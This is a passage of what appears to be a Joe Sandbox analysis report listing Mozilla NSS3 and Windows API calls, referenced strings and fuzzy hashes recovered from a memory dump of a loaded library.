                                                            • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CA02D30
                                                            • CERT_MakeCANickname.NSS3(00000001), ref: 6CA02D3F
                                                            • free.MOZGLUE(00000000), ref: 6CA02D73
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA02DB8
                                                            • free.MOZGLUE ref: 6CA02DC8
                                                              • Part of subcall function 6CA03E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA03EC2
                                                              • Part of subcall function 6CA03E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA03ED6
                                                              • Part of subcall function 6CA03E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA03EEE
                                                              • Part of subcall function 6CA03E60: PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA03F02
                                                              • Part of subcall function 6CA03E60: PL_FreeArenaPool.NSS3 ref: 6CA03F14
                                                              • Part of subcall function 6CA03E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA03F27
                                                            Similarity
                                                            • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                            • String ID:
                                                            • API String ID: 3941837925-0
                                                            APIs
                                                              • Part of subcall function 6CA040D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CA03F7F,?,00000055,?,?,6CA01666,?,?), ref: 6CA040D9
                                                              • Part of subcall function 6CA040D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CA01666,?,?), ref: 6CA040FC
                                                              • Part of subcall function 6CA040D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CA01666,?,?), ref: 6CA04138
                                                            • PR_GetCurrentThread.NSS3 ref: 6CA07CFD
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CB29030), ref: 6CA07D1B
                                                              • Part of subcall function 6CA5FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CA01A3E,00000048,00000054), ref: 6CA5FD56
                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CB29048), ref: 6CA07D2F
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CA07D50
                                                            • PR_GetCurrentThread.NSS3 ref: 6CA07D61
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA07D7D
                                                            • free.MOZGLUE(?), ref: 6CA07D9C
                                                            • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CA07DB8
                                                            • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CA07E19
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                            • String ID:
                                                            • API String ID: 70581797-0
                                                            • Opcode ID: c17c63cb31721718a158fe771e2fd1f4d031b0134f63520b319032b804c16ab8
                                                            • Instruction ID: 34b0fe5f2d74b688a3a086658fad49e554bd225b31256a149b16ac165d03dde3
                                                            • Opcode Fuzzy Hash: c17c63cb31721718a158fe771e2fd1f4d031b0134f63520b319032b804c16ab8
                                                            • Instruction Fuzzy Hash: E541E772B0011A9BDB009E69BC41BBF37E8AF5039CF090024ED09E7751E730E999CBA1
                                                            APIs
                                                            • free.MOZGLUE(?,00000000,00000000,?,?,?,6CA180DD), ref: 6CA17F15
                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CA180DD), ref: 6CA17F36
                                                            • free.MOZGLUE(?,?,?,6CA180DD), ref: 6CA17F3D
                                                            • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CA180DD), ref: 6CA17F5D
                                                            • DeleteCriticalSection.KERNEL32(?,6CA180DD), ref: 6CA17F94
                                                            • free.MOZGLUE(?), ref: 6CA17F9B
                                                            • PR_SetError.NSS3(FFFFE08B,00000000,6CA180DD), ref: 6CA17FD0
                                                            • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CA180DD), ref: 6CA17FE6
                                                            • free.MOZGLUE(?,6CA180DD), ref: 6CA1802D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                            • String ID:
                                                            • API String ID: 4037168058-0
                                                            • Opcode ID: 8651f0144252d0a4b89966e90ce9a718b20f7f92f9fe886c84d4bf98e7a1aef2
                                                            • Instruction ID: 15044bb3ba6e0831e2525777934c88e7aaf4cbf8038ddeddae9083120571987b
                                                            • Opcode Fuzzy Hash: 8651f0144252d0a4b89966e90ce9a718b20f7f92f9fe886c84d4bf98e7a1aef2
                                                            • Instruction Fuzzy Hash: A941C5B5B491104FEB009FBAD988A5737B5AB4A358F150229E519C7BC0D7309449CBA2
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA5FF00
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA5FF18
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CA5FF26
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA5FF4F
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA5FF7A
                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA5FF8C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                            • String ID:
                                                            • API String ID: 1233137751-0
                                                            • Opcode ID: d087b2664996614aaf8bf9888f3097f47693f3eceeb3b684fdd31ef5dc62b1ab
                                                            • Instruction ID: 4c280345943bbc08da4dec267e4aa28d7dc0eff7f698ef2f8b83b97e829679a8
                                                            • Opcode Fuzzy Hash: d087b2664996614aaf8bf9888f3097f47693f3eceeb3b684fdd31ef5dc62b1ab
                                                            • Instruction Fuzzy Hash: B53168F29053129BEB108E9A9C40B5B76A8AF52348F19813DED19C7F00E732D9ACC7D1
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CA638BD), ref: 6CA63CBE
                                                            • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CA638BD), ref: 6CA63CD1
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63CF0
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CB3B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63D0B
                                                            • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63D1A
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CB3B369,000000FF,00000000,00000000,00000000,6CA638BD), ref: 6CA63D38
                                                            • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6CA63D47
                                                            • free.MOZGLUE(00000000), ref: 6CA63D62
                                                            • free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63D6F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
                                                            • String ID:
                                                            • API String ID: 2345246809-0
                                                            • Opcode ID: a34c524b1000892ce4b98ec6335f4f270e406b5fd0d32b1f57b7d9d9e5eeee83
                                                            • Instruction ID: 23f0ff05fa04229fe2a13234accef225babb24c6addb3d84afc552b629bd37a2
                                                            • Opcode Fuzzy Hash: a34c524b1000892ce4b98ec6335f4f270e406b5fd0d32b1f57b7d9d9e5eeee83
                                                            • Instruction Fuzzy Hash: AB21DBB970211277FF106A7B8C09E7739ADDF866B4F180635B939D7AC0DA60D841C6B1
                                                            APIs
                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CA6536F,00000022,?,?,00000000,?), ref: 6CA64E70
                                                            • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CA64F28
                                                            • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CA64F8E
                                                            • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CA64FAE
                                                            • free.MOZGLUE(?), ref: 6CA64FC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                            • String ID: %s=%c%s%c$%s=%s
                                                            • API String ID: 2709355791-2032576422
                                                            • Opcode ID: 69969d87dc01616e2a0f0767e61802447bc56d9a5dddc335c47744ba693e9023
                                                            • Instruction ID: 65501a48a5591041f0ad2ccce96f62112bf5ec3f22fd0d9b0e95a997094d341c
                                                            • Opcode Fuzzy Hash: 69969d87dc01616e2a0f0767e61802447bc56d9a5dddc335c47744ba693e9023
                                                            • Instruction Fuzzy Hash: B8512871A452858BEB02CA6BC4B07FF7FF59F46308F2C8126E894A7E41D32598C58791
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A7E27
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A7E67
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C9A7EED
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A7F2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 912837312-598938438
                                                            • Opcode ID: ebd165a9b0908317824bd522137908b3bc4cf71306c69835f8a08d0104c665f2
                                                            • Instruction ID: f9baaa8d28c0c2237a78e53880882b5f76d06ce972c5c5e8a1073d50ca2953c4
                                                            • Opcode Fuzzy Hash: ebd165a9b0908317824bd522137908b3bc4cf71306c69835f8a08d0104c665f2
                                                            • Instruction Fuzzy Hash: BA61F774A042559FCB04CFA5C891B6A37B6BF45318F2449A8EC085FB6AD730EC56CB90
                                                            APIs
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C98FD7A
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C98FD94
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C98FE3C
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C98FE83
                                                              • Part of subcall function 6C98FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C98FEFA
                                                              • Part of subcall function 6C98FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C98FF3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 1169254434-598938438
                                                            • Opcode ID: 8700152d62069e91e60b673c2d0151a06881da9f304a1238a273a0b321033b3d
                                                            • Instruction ID: fd2320e473905eb63295a3c7ce5fc8ea898504f93fb8e4c844952b70c04bfc38
                                                            • Opcode Fuzzy Hash: 8700152d62069e91e60b673c2d0151a06881da9f304a1238a273a0b321033b3d
                                                            • Instruction Fuzzy Hash: 9F51AF74A01215DFCF04CFA9C890AAEB7B5FF48318F145469EA05ABB52E735EC54CBA0
                                                            APIs
                                                            • TlsGetValue.KERNEL32(00000000,00000000,?,6CA2124D,00000001), ref: 6CA18D19
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CA2124D,00000001), ref: 6CA18D32
                                                            • PL_ArenaRelease.NSS3(?,?,?,?,?,6CA2124D,00000001), ref: 6CA18D73
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CA2124D,00000001), ref: 6CA18D8C
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CA2124D,00000001), ref: 6CA18DBA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                            • String ID: KRAM$KRAM
                                                            • API String ID: 2419422920-169145855
                                                            • Opcode ID: 2f6b3b88276e61305244afdcb18d5106dbabcf4c05301cbf633674a811d71580
                                                            • Instruction ID: ac14603295c566f73fc4f5ccb9aeb283e784cb8a78a3f3322cafe9c540f91a00
                                                            • Opcode Fuzzy Hash: 2f6b3b88276e61305244afdcb18d5106dbabcf4c05301cbf633674a811d71580
                                                            • Instruction Fuzzy Hash: 10219FB5A187018FCB00EF78C58465AB7F1FF45318F1A896AD89887B01EB30D886CB91
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CA3ACE6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA3AD14
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA3AD23
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA3AD39
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                            • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                            • API String ID: 332880674-3521875567
                                                            • Opcode ID: 5bc7753053892b06e427501cc65eead6cd6ee32833d12d4fedbcfc757e72b596
                                                            • Instruction ID: 3dcc9c2de27d0ecdc217f1334bdb2d8c1f501bdae2ccfc95673f38f7b522fb75
                                                            • Opcode Fuzzy Hash: 5bc7753053892b06e427501cc65eead6cd6ee32833d12d4fedbcfc757e72b596
                                                            • Instruction Fuzzy Hash: 2B210A356001749FEF01DBA5ED98B7A337AAB42399F440025E80DD7A91DF389C89C793
                                                            APIs
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAD4DC3
                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAD4DE0
                                                            Strings
                                                            • API call with %s database connection pointer, xrefs: 6CAD4DBD
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAD4DCB
                                                            • misuse, xrefs: 6CAD4DD5
                                                            • %s at line %d of [%.10s], xrefs: 6CAD4DDA
                                                            • invalid, xrefs: 6CAD4DB8
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                            • API String ID: 632333372-2974027950
                                                            • Opcode ID: 41dbee9a130af2a320637c8037a9fe9d86040f08de75f6f8fc6eee410c3cda1d
                                                            • Instruction ID: 8422d2df0d25d01048e791cfaef3cf1a4028f147cbf5c6ce824c5fd645966d4a
                                                            • Opcode Fuzzy Hash: 41dbee9a130af2a320637c8037a9fe9d86040f08de75f6f8fc6eee410c3cda1d
                                                            • Instruction Fuzzy Hash: E0F0E929E246B43BDB004A15DC12F8737655F2233DF5B19E1ED887BE92E215F99082C1
                                                            APIs
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAD4E30
                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAD4E4D
                                                            Strings
                                                            • API call with %s database connection pointer, xrefs: 6CAD4E2A
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAD4E38
                                                            • misuse, xrefs: 6CAD4E42
                                                            • %s at line %d of [%.10s], xrefs: 6CAD4E47
                                                            • invalid, xrefs: 6CAD4E25
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                            • API String ID: 632333372-2974027950
                                                            • Opcode ID: a8bec606367a49edd92415b6e53d2a8df249526841c1b9a459c017c63b437f3e
                                                            • Instruction ID: b9ab290dcfeaac487dbf4195c879b5d4aff93824b6f48c4b6632e5c4782f861e
                                                            • Opcode Fuzzy Hash: a8bec606367a49edd92415b6e53d2a8df249526841c1b9a459c017c63b437f3e
                                                            • Instruction Fuzzy Hash: 74F02719E949B93BEB100225DC11FC737A95B22339F5F95A1EE0C77E92DA0DF8A042D1
                                                            APIs
                                                            • PR_SetError.NSS3(00000000,00000000,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?,?,00000000,?,?), ref: 6CA40CB3
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?), ref: 6CA40DC1
                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?), ref: 6CA40DEC
                                                              • Part of subcall function 6CA60F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA02AF5,?,?,?,?,?,6CA00A1B,00000000), ref: 6CA60F1A
                                                              • Part of subcall function 6CA60F10: malloc.MOZGLUE(00000001), ref: 6CA60F30
                                                              • Part of subcall function 6CA60F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA60F42
                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?), ref: 6CA40DFF
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CA41444,?,00000001,?,00000000), ref: 6CA40E16
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?), ref: 6CA40E53
                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?,?,00000000), ref: 6CA40E65
                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?), ref: 6CA40E79
                                                              • Part of subcall function 6CA51560: TlsGetValue.KERNEL32(00000000,?,6CA20844,?), ref: 6CA5157A
                                                              • Part of subcall function 6CA51560: EnterCriticalSection.KERNEL32(?,?,?,6CA20844,?), ref: 6CA5158F
                                                              • Part of subcall function 6CA51560: PR_Unlock.NSS3(?,?,?,?,6CA20844,?), ref: 6CA515B2
                                                              • Part of subcall function 6CA1B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CA21397,00000000,?,6CA1CF93,5B5F5EC0,00000000,?,6CA21397,?), ref: 6CA1B1CB
                                                              • Part of subcall function 6CA1B1A0: free.MOZGLUE(5B5F5EC0,?,6CA1CF93,5B5F5EC0,00000000,?,6CA21397,?), ref: 6CA1B1D2
                                                              • Part of subcall function 6CA189E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CA188AE,-00000008), ref: 6CA18A04
                                                              • Part of subcall function 6CA189E0: EnterCriticalSection.KERNEL32(?), ref: 6CA18A15
                                                              • Part of subcall function 6CA189E0: memset.VCRUNTIME140(6CA188AE,00000000,00000132), ref: 6CA18A27
                                                              • Part of subcall function 6CA189E0: PR_Unlock.NSS3(?), ref: 6CA18A35
                                                            Similarity
                                                            • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                            • String ID:
                                                            • API String ID: 1601681851-0
                                                            • Opcode ID: 5d9c282da0f5bfa299015fe1a794069f9ce7b7e9775a250346624a38b5e03d79
